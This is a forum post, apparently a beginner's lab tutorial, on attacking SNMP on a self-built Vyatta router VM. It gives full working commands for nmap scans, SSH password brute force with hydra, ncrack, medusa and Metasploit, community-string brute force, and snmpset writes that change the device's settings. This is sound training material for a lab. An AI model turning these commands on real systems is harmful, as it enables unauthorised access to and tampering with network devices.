Activity Discussions Ethical Hacking Tutorials SNMP Pentesting

  • SNMP Pentesting

  • nikki

    Member
    May 7, 2020 at 8:23 am

    PENTESTING SNMP PROTOCOL

    hi there this is nikhil

    in this i am gonna explain you how to pentest snmp protocol

    i assume u know basics of snmp protocol

    if you dont

    then i have these links for you where you can get better understanding of SNMP protocol

    even you know i suggest you to take time and read this,helps in revision

    https://www.networkmanagementsoftware.com/snmp-tutorial/

    https://www.networkmanagementsoftware.com/snmp-tutorial-part-2-rounding-out-the-basics/

    OK LETS GET STARTED

    SETTING UP OUR SNMP LAB

    i assume you have already setup kali linux on your hyperv

    if you dont have setup kali linux

    there are many youtube tutorials on how to setup kali linux in virtualization enivronment

    even i have made tutorial on youtube

    https://www.youtube.com/watch?v=kEKIeDgzG7A

    i hope you are ready with kali linux

    we need to simulate our snmp service

    for that we use a router called ‘vyatta’

    Download here

    http://0.us.mirrors.vyos.net/vyatta/vc6.5/images/

    Load it into VMware or your VirtualBox

    Start the VM

    Now

    it boots

    it had booted in live mode

    it asks for credentials

    default credentials are

    vyatta

    vyatta

    after login we need to install vyatta on harddisk

    for that type this in command line

    $install image

    then hit Enter

    it asks you for basic info like

    for almost all options u click enter (default)

    but

    now for the above option write Ýes and then hit enter

    now it asks for a password

    set your favourite or set default ‘vyatta’

    NOW REMOVE THE LIVE CD FROM YOUR VMWARE/VBOX AND REBOOT

    now start vyatta vm

    we need to enable some services on our vyatta inorder to start pentesting

    CONFIGURING VYATTA

    you can see your shell prompt is in ‘$’

    type

    configure

    to enter into configuration mode

    and enter

    set service ssh

    we have enabled ssh and we need to save our changes

    for that type

    commit

    save

    now we need to set ip address for our vm , type

    ( iassume u r still in config mode)

    set interfaces ethernet eth0 address 10.1.1.20/24

    now hit enter

    you can check ip address by typing

    show interfaces

    try to ping from vyatta ( 10.1.1.20 in my case ) to kali linux ( 10.1.1.50 in my case)

    successful

    full view of my network

    i setup using gns3 simulator

    dont worry even in simple vmware setup it works

    CONFIGURING SNMP AND SOME MORE SERVICES

    we wlill setup ssh(already done),telnet,https,snmp

    syntax will be similar

    set service service-type

    here snmp community strings are like passwords

    i set them as ‘public’ and ‘private’ because out of the box they come with those strings and netadmins forget to change the default strings

    our setup was almost complete and if we want to configure anything

    (if i forgot) we do that later

    SCANNING

    now lets do basic nmap scan aganist my vyatta – 10.1.1.20

    nmap -sV -n 10.1.1.20

    -sV for version scanning

    -n for dnsname lookup ,adjust with ip only lol

    we got some info about services that are running on vyatta

    but where is snmp?

    its a udp protocol

    by default nmap scans tcp ports

    and lot of pentesters forget about udp scanning

    so lets scan with -sU option

    it took me lot of time to scan

    as we know snmp service is running lets directly scan that snmp ports

    161 and 162

    161 is for nms to send queries to agents

    and 162 is for agents to contact or inform to nms

    nmap -sV -n -sU -p161,162 10.1.1.20

    -sU for scanning udp ports

    -p for specfiying user interested ports

    as we can see 161 port is open and running SNMPv1

    lets run nmap inbuilt scripts with -sC option

    nmap -sV -n -sU -p161 -sC 10.1.1.20

    -sC for use default nmap scripts

    we got a ton of information about device because nmap scripts used defualt credentials of snmp which are ‘public’ and ‘private’

    take a look and try to understand different things

    small exercise to you :

    change those default strings and nmap scripts again

    now notice the output

    BRUTEFORCING SSH

    now we setup a user on vyatta and try to bruteforce login credentials

    logon to vyatta and type configure to enter into configuration mode

    now type

    set system login user admin authentication plaintext-password aaaa

    now commit and save

    now we have to generate our wordlist

    lets generate simple wordlist

    we use crunch to generate our wordlist

    crunch 4 4 abcd > wordlist

    we use some tools to bruteforce ssh login

    HYDRA

    type this command to bruteforce

    hydra -l admin -P wordlist 10.1.1.20 ssh

    -l for username

    -L for list of usernames

    -p password

    -P for list of passwords

    wordlist- my wordlist

    ssh-protocol i want to bruteforce

    as you can see hydra successfully found the password ‘aaaa’

    NCRACK

    type this syntax

    ncrack -v -T 5 –user admin -P wordlist 10.1.1.20:22

    -v for verbose that means we can know whats happening

    -T 5 use 5 threads

    –user for username

    you didnot see password on the output

    you think its failed right?

    yeah it failed

    but i can run it again and show when it succeeded

    but what i want is

    you need to understand that some tools fail at some time

    so always dont rely on one tool

    learn more tools and how they work and if time permits learn python and write your own scripts

    MEDUSA

    type this syntax

    medusa -h 10.1.1.20 -u admin -P wordlist -M ssh

    -h for host

    -u for username

    -P for list of passwords

    -M for module you want to execute

    if you want to know what modules medusa support

    type

    medusa -d

    medusa succeeded

    METASPLOIT MODULES

    heres my best friend metasploit

    i love metasploit more than my girlfriend(who doesnot exist)

    first we need to setup database to make metasploit searches faster and also to store results

    service postgresql start

    and then type

    msfconsole

    following screenshows up

    now to brute force ssh

    we need to search for ‘ssh_login’

    its a module thats inbuilt in metasploit

    after typing

    search ssh_login

    we gonna use first one

    for that we need to use ‘use’

    type this

    use auxiliary/scanner/ssh/ssh_login

    now you get this

    after that type

    show options

    now you get

    so much output

    dont worry

    take time to understand whats that

    thats parameters required to bruteforce

    we gonna use main ones

    we gonna set rhosts to our vyatta vm

    set rhosts 10.1.1.20

    and username to admin

    set username admin

    and passwordfile to our wordlist path

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    type run and hit enter

    successful password is ‘aaaa’

    and u can also notice that command shell is also opened

    now you can interact with that shell

    type exit to exitout of the session

    BRUTEFORCING SNMP COMMUNITY STRINGS

    first lets delete our public and private community strings

    by

    delete service snmp community public

    delete service snmp community private

    and i set ‘bbbb’ as ro string and ‘cccc’ as rw string

    NMAP SCRIPTING ENGINE

    before we used -sC to use nmap default scripts

    now we use snmp-brute script to bruteforce snmp strings

    type this

    nmap -sU -p 161 -n –script snmp-brute 10.1.1.20 –script-args snmp-brute.communitiesdb=/root/Desktop/wordlist

    hurray!

    we got snmp community strings ‘bbbb’ and ‘cccc’

    METASPLOIT MODULES

    metasploit be like : you cant live without me! where did that bring you? BACK 2 ME

    now we use snmp_login module for bruteforcing

    search snmp_login

    use auxiliary/scanner/snmp/snmp_login

    now guess what we type?

    yeah

    show options

    as you can see bunch of stuff similar to when we used ssh_login module

    in this also we only use main ones

    set rhosts 10.1.1.20

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    i think these are main ones

    u can customize yourself

    i suggest you to set threads to 10

    its gonna be slow if u dont set

    its gonna take really long time

    now i reduced items and run again

    MEDUSA

    similar syntax as that of ssh

    medusa -h 10.1.1.20 -u admin -P wordlist1 -M snmp

    medusa also succeeded

    ONESIXTYONE

    onesixtyone is also tool used to bruteforce snmp community strings

    as name says 161 is port of snmp , thus named

    onesixtyone -c wordlist 10.1.1.20

    got community strings as expected

    POST EXPLOITATION

    ok we got the community strings , now what?

    we can read and know the configuration of the network and also other information that is stored in that router

    lets get started

    snmpwalk

    this tool walks along the OID by get-next requests and gets all the info you needed

    snmpwalk -v1 -c bbbb 10.1.1.20

    -v1 is the snmp version number

    -c is community string

    you get ton of information

    ok what is this information?

    all the information is stored in object and its accessed using numbers

    you can copy paste any oid and check here

    http://www.oid-info.com/

    ok can we modify the value?

    yes because we have rw string which is ‘ccc’

    ok how we can modify?

    we use

    snmpset

    ok lets modify the vyatta name and its oid is

    iso.3.6.1.2.1.1.5.0

    snmpset -v1 -c cccc 10.1.1.20 iso.3.6.1.2.1.1.5.0 s hacked

    s for string notation

    its saying that value changed

    lets check by running snmpwalk again

    snmpwalk -v1 -c bbbb 10.1.1.20 |head -10

    head command gives only first 10 lines of output

    as you can see our ‘vyatta’ string has changed into ‘hacked’

    you may find that with snmpwalk we are getting in oid format and we need a conversion like what ip address its using,sys configuration etc

    for that we have

    snmpcheck

    snmpcheck -c cccc -t 10.1.1.20

    -t for specifying target

    you can now easily understand the output than snmpwalk

    METASPLOIT MODULES

    again huh?

    hell yeah

    there are some snmp post exploitation modules inorder to get information

    snmp_enum

    search snmp_enum

    now as usual type

    show options

    set community ccc

    set rhosts 10.1.1.20

    run

    you get lot of output showing sys information,processes running and so much

    snmp_set

    as the name implies that this modules modifies the oid values as snmpset command

    as normal

    search snmp_set

    use path_to_snmp_set

    show options

    set rhosts 10.1.1.20

    set community cccc

    set oid iso.3.6.1.2.1.1.5.0

    run

    now u get error because of ‘iso ‘ in our oid string

    we need to convert it into number

    as we know value of iso is 1 (top of tree)

    set oid 1.3.6.1.2.1.1.5.0

    set oidvalue value_you_want_to_set

    successful

    we check using snmpwalk command

    successful

    there is a tool to convert oid strings to values

    we need to find oid number of ‘iso’

    we can use

    snmptranslate

    snmptranslate -On iso.3.6.1.2.1.1.5.0


    sorry only 2 photos are showing

    i hope u get more understand when u r doing this practically

Log in to reply.

Original Post
0 of 0 posts June 2018
Now
SECARMY - Security and Research Community